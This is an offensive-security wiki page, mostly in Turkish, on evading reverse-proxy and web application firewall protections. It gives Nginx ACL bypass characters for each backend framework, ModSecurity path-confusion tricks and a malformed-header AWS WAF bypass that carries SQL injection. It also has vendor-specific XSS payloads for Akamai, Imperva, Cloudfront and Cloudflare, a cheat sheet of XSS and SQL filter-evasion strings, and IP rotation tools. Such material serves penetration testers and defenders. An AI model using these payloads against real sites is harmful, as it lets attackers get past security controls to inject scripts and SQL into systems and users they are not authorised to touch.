# Proxy / WAF Koruma Bypass

{{#include ../banners/hacktricks-training.md}}


## Nginx ACL kurallarını Pathname Manipulation ile Bypass Etme <a href="#heading-pathname-manipulation-bypassing-reverse-proxies-and-load-balancers-security-rules" id="heading-pathname-manipulation-bypassing-reverse-proxies-and-load-balancers-security-rules"></a>

Teknikler [from this research](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies).

Nginx kural örneği:
```plaintext
location = /admin {
deny all;
}

location = /admin/ {
deny all;
}
```
Bypass'ları önlemek için Nginx, yolu kontrol etmeden önce normalizasyon yapar. Ancak backend sunucu farklı bir normalizasyon (nginx'in kaldırmadığı karakterleri kaldırmak gibi) uyguluyorsa, bu savunma atlanabilir.

### **NodeJS - Express**

| Nginx Sürümü | **Node.js Bypass Characters** |
| ------------- | ----------------------------- |
| 1.22.0        | `\xA0`                        |
| 1.21.6        | `\xA0`                        |
| 1.20.2        | `\xA0`, `\x09`, `\x0C`        |
| 1.18.0        | `\xA0`, `\x09`, `\x0C`        |
| 1.16.1        | `\xA0`, `\x09`, `\x0C`        |

### **Flask**

| Nginx Sürümü | **Flask Bypass Characters**                                    |
| ------------- | -------------------------------------------------------------- |
| 1.22.0        | `\x85`, `\xA0`                                                 |
| 1.21.6        | `\x85`, `\xA0`                                                 |
| 1.20.2        | `\x85`, `\xA0`, `\x1F`, `\x1E`, `\x1D`, `\x1C`, `\x0C`, `\x0B` |
| 1.18.0        | `\x85`, `\xA0`, `\x1F`, `\x1E`, `\x1D`, `\x1C`, `\x0C`, `\x0B` |
| 1.16.1        | `\x85`, `\xA0`, `\x1F`, `\x1E`, `\x1D`, `\x1C`, `\x0C`, `\x0B` |

### **Spring Boot**

| Nginx Sürümü | **Spring Boot Bypass Characters** |
| ------------- | --------------------------------- |
| 1.22.0        | `;`                               |
| 1.21.6        | `;`                               |
| 1.20.2        | `\x09`, `;`                       |
| 1.18.0        | `\x09`, `;`                       |
| 1.16.1        | `\x09`, `;`                       |

### **PHP-FPM**

Nginx FPM yapılandırması:
```plaintext
location = /admin.php {
deny all;
}

location ~ \.php$ {
include snippets/fastcgi-php.conf;
fastcgi_pass unix:/run/php/php8.1-fpm.sock;
}
```
Nginx, `/admin.php` erişimini engelleyecek şekilde yapılandırılmıştır ancak `/admin.php/index.php` yoluna erişilerek bu engel atlatılabilir.

### Nasıl önlenir
```plaintext
location ~* ^/admin {
deny all;
}
```
## Mod Security Kurallarını Aşma <a href="#heading-bypassing-aws-waf-acl" id="heading-bypassing-aws-waf-acl"></a>

### Yol Karışıklığı

[**Bu yazıda**](https://blog.sicuranext.com/modsecurity-path-confusion-bugs-bypass/) ModSecurity v3 (3.0.12'ye kadar) sürümünde, erişilen yolu (parametrelerin başlangıcına kadar) içermesi gereken `REQUEST_FILENAME` değişkeninin **uygunsuz şekilde uygulandığı** açıklanıyor. Bu, yolu elde etmek için bir URL decode işlemi gerçekleştirdiği içindir.\
Bu yüzden, mod security'de `http://example.com/foo%3f';alert(1);foo=` gibi bir istek, `%3f` `?`'ye dönüştüğü için yolun sadece `/foo` olduğunu varsayar (bu URL yolunu sonlandırır), oysa sunucunun alacağı gerçek yol `/foo%3f';alert(1);foo=` olacaktır.

`REQUEST_BASENAME` ve `PATH_INFO` değişkenleri de bu hatadan etkilendi.

Benzer bir durum Mod Security'nin 2. sürümünde de meydana geldi; bu, kullanıcıların yedek dosyalarla ilişkili belirli uzantılara sahip dosyalara (ör. `.bak`) erişmesini engelleyen bir korumayı, noktanın URL encode edilmiş hali `%2e` gönderilerek atlamaya izin veriyordu; örneğin: `https://example.com/backup%2ebak`.

## AWS WAF ACL'yi Aşma <a href="#heading-bypassing-aws-waf-acl" id="heading-bypassing-aws-waf-acl"></a>

### Hatalı Header

[Bu araştırma](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies) AWS tarafından doğru şekilde parse edilmeyen ancak backend sunucu tarafından parse edilen "malformed" bir header göndererek HTTP header'ları üzerinde uygulanan AWS WAF kurallarını atlamanın mümkün olduğunu belirtiyor.

Örneğin, X-Query header'ında bir SQL injection bulunan aşağıdaki isteği göndermek:
```http
GET / HTTP/1.1\r\n
Host: target.com\r\n
X-Query: Value\r\n
\t' or '1'='1' -- \r\n
Connection: close\r\n
\r\n
```
It was possible to bypass AWS WAF because it wouldn't understand that the next line is part of the value of the header while the NODEJS server did (this was fixed).

## Genel WAF bypass'ları

### İstek Boyutu Limitleri

Genellikle WAF'lerin kontrol ettikleri isteklerde belirli bir uzunluk limiti vardır ve bir POST/PUT/PATCH isteği bu limiti aşarsa, WAF isteği kontrol etmez.

- For AWS WAF, you can [**check the documentation**](https://docs.aws.amazon.com/waf/latest/developerguide/limits.html)**:**

<table data-header-hidden><thead><tr><th width="687"></th><th></th></tr></thead><tbody><tr><td>Maximum size of a web request body that can be inspected for Application Load Balancer and AWS AppSync protections</td><td>8 KB</td></tr><tr><td>Maximum size of a web request body that can be inspected for CloudFront, API Gateway, Amazon Cognito, App Runner, and Verified Access protections**</td><td>64 KB</td></tr></tbody></table>

- From [**Azure docs**](https://learn.microsoft.com/en-us/azure/web-application-firewall/ag/application-gateway-waf-request-size-limits)**:**

Older Web Application Firewalls with Core Rule Set 3.1 (or lower) allow messages larger than **128 KB** by turning off request body inspection, but these messages won't be checked for vulnerabilities. For newer versions (Core Rule Set 3.2 or newer), the same can be done by disabling the maximum request body limit. When a request exceeds the size limit:

If p**revention mode**: Logs and blocks the request.\
If **detection mode**: Inspects up to the limit, ignores the rest, and logs if the `Content-Length` exceeds the limit.

- From [**Akamai**](https://community.akamai.com/customers/s/article/Can-WAF-inspect-all-arguments-and-values-in-request-body?language=en_US)**:**

By default, the WAF inspects only the first 8KB of a request. It can increase the limit up to 128KB by adding Advanced Metadata.

- From [**Cloudflare**](https://developers.cloudflare.com/ruleset-engine/rules-language/fields/#http-request-body-fields)**:**

Up to 128KB.

### Static assets inspection gaps (.js GETs)

Bazı CDN/WAF katmanları, `.js` ile biten yollar gibi statik varlıklar için yapılan GET isteklerinde zayıf veya hiç content inspection uygulamayabilir; buna karşın rate limiting ve IP reputation gibi global kuralları uygulamaya devam edebilir. Statik uzantıların auto-caching ile birleştiğinde, bu durum sonraki HTML cevaplarını etkileyen kötü amaçlı varyantların teslim edilmesi veya tohumlanması için kötüye kullanılabilir.

Pratik kullanım örnekleri:

- İçerik denetiminden kaçınmak için `.js` yoluna yapılan bir GET'de güvensiz header'lara (ör. `User-Agent`) payload gönderin, ardından cachelenmiş varyantı etkilemek için hemen ana HTML'i isteyin.
- Temiz/yeni bir IP kullanın; bir IP işaretlendikten sonra yönlendirme değişiklikleri tekniği güvenilmez hale getirebilir.
- Burp Repeater'da, aynı front-end yolundan iki isteği (`.js` sonra HTML) yarıştırmak için "Send group in parallel" (single-packet style) kullanın.

Bu, header-reflection cache poisoning ile iyi eşleşir. Bakınız:

{{#ref}}
cache-deception/README.md
{{#endref}}

- [How I found a 0-Click Account takeover in a public BBP and leveraged it to access Admin-Level functionalities](https://hesar101.github.io/posts/How-I-found-a-0-Click-Account-takeover-in-a-public-BBP-and-leveraged-It-to-access-Admin-Level-functionalities/)

### Obfuscation <a href="#ip-rotation" id="ip-rotation"></a>
```bash
# IIS, ASP Clasic
<%s%cr%u0131pt> == <script>

# Path blacklist bypass - Tomcat
/path1/path2/ == ;/path1;foo/path2;bar/;
```
### Unicode Uyumluluğu <a href="#unicode-compatability" id="unicode-compatability"></a>

Unicode normalizasyonunun uygulanışına bağlı olarak (daha fazla bilgi [here](https://jlajara.gitlab.io/Bypass_WAF_Unicode)), Unicode uyumluluğunu paylaşan karakterler WAF'ı atlayarak amaçlanan payload olarak çalıştırılabilir. Uyumlu karakterler [here](https://www.compart.com/en/unicode) adresinde bulunabilir.

#### Örnek <a href="#example" id="example"></a>
```bash
# under the NFKD normalization algorithm, the characters on the left translate
# to the XSS payload on the right
＜img src⁼p onerror⁼＇prompt⁽1⁾＇﹥  --> ＜img src=p onerror='prompt(1)'>
```
### Bypass Contextual WAFs with encodings <a href="#ip-rotation" id="ip-rotation"></a>

As mentioned in [**this blog post**](https://0x999.net/blog/exploring-javascript-events-bypassing-wafs-via-character-normalization#bypassing-web-application-firewalls-via-character-normalization), In order to bypass WAFs able to maintain a context of the user input we could abuse the WAF techniques to actually normalize the users input.

For example, in the post it's mentioned that **Akamai URL decoded a user input 10 times**. Therefore something like `<input/%2525252525252525253e/onfocus` will be seen by Akamai as `<input/>/onfocus` which **might think that it's ok as the tag is closed**. However, as long as the application doesn't URL decode the input 10 times, the victim will see something like `<input/%25252525252525253e/onfocus` which is **still valid for a XSS attack**.

Therefore, this allows to **hide payloads in encoded components** that the WAF will decode and interpret while the victim won't.

Moreover, this can be done not only with URL encoded payloads but also with other encodings such as unicode, hex, octal...

In the post the following final bypasses are suggested:

- Akamai:`akamai.com/?x=<x/%u003e/tabindex=1 autofocus/onfocus=x=self;x['ale'%2b'rt'](999)>`
- Imperva:`imperva.com/?x=<x/\x3e/tabindex=1 style=transition:0.1s autofocus/onfocus="a=document;b=a.defaultView;b.ontransitionend=b['aler'%2b't'];style.opacity=0;Object.prototype.toString=x=>999">`
- AWS/Cloudfront:`docs.aws.amazon.com/?x=<x/%26%23x3e;/tabindex=1 autofocus/onfocus=alert(999)>`
- Cloudflare:`cloudflare.com/?x=<x tabindex=1 autofocus/onfocus="style.transition='0.1s';style.opacity=0;self.ontransitionend=alert;Object.prototype.toString=x=>999">`

It's also mentioned that depending on **how some WAFs understand the context** of the user input, it might be possible to abuse it. The proposed example in the blog is that Akamai allow(ed) to put anything between `/*` and `*/` (potentially because this is commonly used as comments. Therefore, a SQLinjection such as `/*'or sleep(5)-- -*/` won't be caught and will be valid as `/*` is the starting string of the injection and `*/` is commented.

These kind of context problems can also be used to **abuse other vulnerabilities than the one expected** to be exploited by the WAF (e.g. this could also be used to exploit a XSS).

### H2C Smuggling <a href="#ip-rotation" id="ip-rotation"></a>


{{#ref}}
h2c-smuggling.md
{{#endref}}

### IP Rotation <a href="#ip-rotation" id="ip-rotation"></a>

- [https://github.com/ustayready/fireprox](https://github.com/ustayready/fireprox): Generate an API gateway URL to by used with ffuf
- [https://github.com/rootcathacking/catspin](https://github.com/rootcathacking/catspin): Similar to fireprox
- [https://github.com/PortSwigger/ip-rotate](https://github.com/PortSwigger/ip-rotate): Burp Suite plugin that uses API gateway IPs
- [https://github.com/fyoorer/ShadowClone](https://github.com/fyoorer/ShadowClone): A dynamically determined number of container instances are activated based on the input file size and split factor, with the input split into chunks for parallel execution, such as 100 instances processing 100 chunks from a 10,000-line input file with a split factor of 100 lines.
- [https://0x999.net/blog/exploring-javascript-events-bypassing-wafs-via-character-normalization#bypassing-web-application-firewalls-via-character-normalization](https://0x999.net/blog/exploring-javascript-events-bypassing-wafs-via-character-normalization#bypassing-web-application-firewalls-via-character-normalization)

### Regex Bypasses

Different techniques can be used to bypass the regex filters on the firewalls. Examples include alternating case, adding line breaks, and encoding payloads. Resources for the various bypasses can be found at [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XSS%20Injection/README.md#filter-bypass-and-exotic-payloads) and [OWASP](https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html). The examples below were pulled from [this article](https://medium.com/@allypetitt/5-ways-i-bypassed-your-web-application-firewall-waf-43852a43a1c2).
```bash
<sCrIpT>alert(XSS)</sCriPt> #changing the case of the tag
<<script>alert(XSS)</script> #prepending an additional "<"
<script>alert(XSS) // #removing the closing tag
<script>alert`XSS`</script> #using backticks instead of parenetheses
java%0ascript:alert(1) #using encoded newline characters
<iframe src=http://malicous.com < #double open angle brackets
<STYLE>.classname{background-image:url("javascript:alert(XSS)");}</STYLE> #uncommon tags
<img/src=1/onerror=alert(0)> #bypass space filter by using / where a space is expected
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaaa href=javascript:alert(1)>xss</a> #extra characters
Function("ale"+"rt(1)")(); #using uncommon functions besides alert, console.log, and prompt
javascript:74163166147401571561541571411447514115414516216450615176 #octal encoding
<iframe src="javascript:alert(`xss`)"> #unicode encoding
/?id=1+un/**/ion+sel/**/ect+1,2,3-- #using comments in SQL query to break up statement
new Function`alt\`6\``; #using backticks instead of parentheses
data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+ #base64 encoding the javascript
%26%2397;lert(1) #using HTML encoding
<a src="%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aconfirm(XSS)"> #Using Line Feed (LF) line breaks
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=confirm()> # use any chars that aren't letters, numbers, or encapsulation chars between event handler and equal sign (only works on Gecko engine)
```
## Araçlar

- [**nowafpls**](https://github.com/assetnote/nowafpls): WAF'leri uzunluk yoluyla atlatmak için isteklere çöp veri ekleyen Burp eklentisi

## Kaynaklar

- [https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies)
- [https://blog.sicuranext.com/modsecurity-path-confusion-bugs-bypass/](https://blog.sicuranext.com/modsecurity-path-confusion-bugs-bypass/)
- [https://www.youtube.com/watch?v=0OMmWtU2Y_g](https://www.youtube.com/watch?v=0OMmWtU2Y_g)
- [https://0x999.net/blog/exploring-javascript-events-bypassing-wafs-via-character-normalization#bypassing-web-application-firewalls-via-character-normalization](https://0x999.net/blog/exploring-javascript-events-bypassing-wafs-via-character-normalization#bypassing-web-application-firewalls-via-character-normalization)
- [Bir public BBP'de 0-Click Account takeover'ı nasıl buldum ve bunu Admin-Level işlevselliklere erişmek için nasıl kullandım](https://hesar101.github.io/posts/How-I-found-a-0-Click-Account-takeover-in-a-public-BBP-and-leveraged-It-to-access-Admin-Level-functionalities/)


{{#include ../banners/hacktricks-training.md}}